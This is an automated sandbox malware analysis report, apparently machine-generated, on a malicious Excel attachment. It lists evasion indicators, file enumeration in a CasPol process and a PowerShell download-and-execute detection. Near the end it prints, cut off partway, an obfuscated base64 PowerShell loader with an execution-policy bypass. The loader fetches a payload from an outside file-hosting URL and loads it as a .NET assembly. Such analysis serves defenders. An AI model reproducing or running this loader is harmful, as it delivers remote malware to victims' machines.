                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: OC25-11-24.xlsStream path 'MBd00033107/Package' entropy: 7.96667071557 (max. 8.0)
                  Source: OC25-11-24.xlsStream path 'Workbook' entropy: 7.98371213619 (max. 8.0)
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'MBd00033107/Package' entropy: 7.96667071557 (max. 8.0)
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drStream path 'Workbook' entropy: 7.98371213619 (max. 8.0)

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040E54F Sleep,ExitProcess,35_2_0040E54F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,30_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,35_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4398Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2142Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5831Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 685Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1391Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6599Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1520Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1786
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1630
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1926
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1898
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 880
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 639
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1836
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6095
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.3 %
                  Source: C:\Windows\System32\mshta.exe TID: 3672Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 2142 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 5831 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3008Thread sleep count: 6599 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2988Thread sleep count: 1520 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep time: -1200000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2112Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 1256Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep count: 1786 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep count: 1630 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3112Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1932Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 1926 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 1898 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3248Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 880 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep count: 639 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 1836 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep count: 6095 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3900Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4052Thread sleep time: -48000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2228Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3508Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040AE51 FindFirstFileW,FindNextFileW,30_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,33_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,35_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,35_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044D5E9 FindFirstFileExA,35_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,35_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,35_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,35_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,35_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,35_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,35_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00418981 memset,GetSystemInfo,30_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_31-34271
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,30_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,30_2_004044A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00442554 mov eax, dword ptr fs:[00000030h]35_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044E92E GetProcessHeap,35_2_0044E92E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433CD7 SetUnhandledExceptionFilter,35_2_00433CD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00433B44

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jy